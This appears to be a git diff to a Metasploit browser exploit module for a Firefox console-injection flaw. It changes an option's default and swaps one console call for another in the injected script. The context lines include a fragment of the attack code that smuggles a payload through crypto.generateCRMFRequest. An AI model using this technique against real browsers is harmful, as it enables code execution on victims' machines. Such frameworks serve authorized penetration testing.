diff --git a/modules/exploits/multi/browser/firefox_tostring_console_injection.rb b/modules/exploits/multi/browser/firefox_tostring_console_injection.rb index dbf55c0f81..db011c617a 100644 --- a/modules/exploits/multi/browser/firefox_tostring_console_injection.rb +++ b/modules/exploits/multi/browser/firefox_tostring_console_injection.rb @@ -56,12 +56,7 @@ class Metasploit3 < Msf::Exploit::Remote )) register_options([ - OptString.new('CONTENT', [ - true, - "Content to display inside the HTML .", - "An error has occurred. Press to see the error." - ]) + OptString.new('CONTENT', [ false, "Content to display inside the HTML .", "" ]) ], self.class) end @@ -87,7 +82,7 @@ class Metasploit3 < Msf::Exploit::Remote crypto.generateCRMFRequest("CN=Me", "foo", "bar", null, opts.payload, 1024, null, "rsa-ex"); return 5; }; - console.dir(y); + console.time(y); #{datastore['CONTENT']}